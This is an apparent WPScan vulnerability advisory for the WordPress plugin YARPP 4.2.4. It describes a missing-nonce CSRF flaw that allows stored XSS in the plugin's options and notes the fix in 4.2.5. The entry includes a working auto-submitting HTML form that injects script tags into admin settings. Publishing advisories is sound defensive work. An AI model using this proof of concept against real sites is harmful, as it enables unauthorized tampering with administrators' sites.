Yet Another Related Posts Plugin (YARPP) 4.2.4 - CSRF / XSS / RCE

Sign up to our free email alerts service for instant vulnerability notifications!

Description
'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed javascript code which can lead to code execution/administrator actions when the injected code is triggered by an admin user.
Proof of Concept
<body onload="document.getElementById('payload_form').submit()" >
	<form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST" >
		<input type='hidden' name='recent_number' value='12' >
		<input type='hidden' name='recent_units' value='month' >
		<input type='hidden' name='threshold' value='5' >
		<input type='hidden' name='weight[title]' value='no' >
		<input type='hidden' name='weight[body]' value='no' >
		<input type='hidden' name='tax[category]' value='no' >
		<input type='hidden' name='tax[post_tag]' value='consider' >
		<input type='hidden' name='auto_display_post_types[post]' value='on' >
		<input type='hidden' name='auto_display_post_types[page]' value='on' >
		<input type='hidden' name='auto_display_post_types[attachment]' value='on' >
		<input type='hidden' name='auto_display_archive' value='true' >
		<input type='hidden' name='limit' value='1' >
		<input type='hidden' name='use_template' value='builtin' >
		<input type='hidden' name='thumbnails_heading' value='Related posts:' >
		<input type='hidden' name='no_results' value='<script>alert(1);</script>' >
		<input type='hidden' name='before_related' value='<script>alert(1);</script><li>' >
		<input type='hidden' name='after_related' value='</li>' >
		<input type='hidden' name='before_title' value='<script>alert(1);</script><li>' >
		<input type='hidden' name='after_title' value='</li>' >
		<input type='hidden' name='show_excerpt' value='true' >
		<input type='hidden' name='excerpt_length' value='10' >
		<input type='hidden' name='before_post' value='+<small>' >
		<input type='hidden' name='after_post' value='</small>' >
		<input type='hidden' name='order' value='post_date ASC' >
		<input type='hidden' name='promote_yarpp' value='true' >
		<input type='hidden' name='rss_display' value='true' >
		<input type='hidden' name='rss_limit' value='1' >
		<input type='hidden' name='rss_use_template' value='builtin' >
		<input type='hidden' name='rss_thumbnails_heading' value='Related posts:' >
		<input type='hidden' name='rss_no_results' value='No Results' >
		<input type='hidden' name='rss_before_related' value='<li>' >
		<input type='hidden' name='rss_after_related' value='</li>' >
		<input type='hidden' name='rss_before_title' value='<li>' >
		<input type='hidden' name='rss_after_title' value='</li>' >
		<input type='hidden' name='rss_show_excerpt' value='true' >
		<input type='hidden' name='rss_excerpt_length' value='10' >
		<input type='hidden' name='rss_before_post' value='+<small>' >
		<input type='hidden' name='rss_after_post' value='</small>' >
		<input type='hidden' name='rss_order' value='score DESC' >
		<input type='hidden' name='rss_promote_yarpp' value='true' >
		<input type='hidden' name='update_yarpp' value='Save Changes' >
	</form>
</body>

Affects

Plugin yet-another-related-posts-plugin
fixed in version 4.2.5

References

EXPLOITDB 36954
PACKETSTORM 131830
URL http://web.archive.org/web/20150912144611/http://research.evex.pw/?vuln=15

Classification

Type MULTI

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 508
Verified No
WPVDB ID 7976

Timeline

Publicly Published 2015-05-08 (over 1 year ago)
Added 2015-05-08 (over 1 year ago)
Last Updated 2016-04-24 (8 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.